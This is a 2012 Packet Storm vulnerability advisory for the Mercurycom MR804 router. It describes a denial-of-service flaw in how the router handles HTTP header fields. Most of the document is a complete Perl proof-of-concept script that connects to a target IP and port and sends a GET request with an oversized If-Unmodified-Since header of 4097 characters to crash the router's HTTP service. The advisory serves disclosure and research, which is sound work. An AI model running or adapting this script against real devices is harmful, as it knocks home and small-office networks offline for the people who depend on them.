Mercurycom MR804 Router Denial Of Service

2012-02-22T00:00:00
ID PACKETSTORM:110044
Type packetstorm
Reporter demonalex
Modified 2012-02-22T00:00:00

Description

                                        
                                            `Title: Mercurycom MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerability  
  
Product : Mercurycom MR804 Router  
  
Hardware Version : MR804 v8.0 081C3113  
  
Software Version : 3.8.1 Build 101220 Rel.53006nB  
  
Vendor: http://www.mercurycom.com.cn/  
  
Class: Boundary Condition Error   
  
CVE:  
  
Remote: Yes   
  
Local: No   
  
Published: 2012-02-21  
  
Updated:   
  
Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)  
  
Bug Description :  
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)  
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,  
If-Unmodified-Since, etc...) in its HTTP service.  
  
POC:  
#-------------------------------------------------------------  
#!/usr/bin/perl -w  
use Socket;  
$|=1;  
print '*********************************'."\n";  
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";  
print '* writed by demonalex@163.com *'."\n";  
print '*********************************'."\n";  
$evil='A'x4097;  
$test_ip=shift; #target ip  
$test_port=shift; #target port  
if(!defined($test_ip) || !defined($test_port)){  
die "usage : $0 target_ip target_port\n";  
}  
$test_payload=  
"GET / HTTP/1.0\r\n".  
"Accept: */*\r\n".  
"Accept-Language: zh-cn\r\n".  
"UA-CPU: x86\r\n".  
"If-Unmodified-Since: ".$evil."\r\n".  
"Accept-Encoding: gzip, deflate\r\n".  
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".  
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".  
"Host: ".$test_ip."\r\n".  
"Connection: Keep-Alive"."\r\n\r\n";  
$test_target=inet_aton($test_ip);  
$test_target=sockaddr_in($test_port, $test_target);  
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";  
connect(SOCK, $test_target) || die "cannot connect the target!\n";  
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";  
#recv(SOCK, $test_payload, 100, 0);  
close(SOCK);  
print "done!\n";  
exit(1);  
#-------------------------------------------------------------  
  
Credits : This vulnerability was discovered by demonalex@163.com  
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk  
Pentester/Researcher  
Dark2S Security Team/PolyU.HK  
`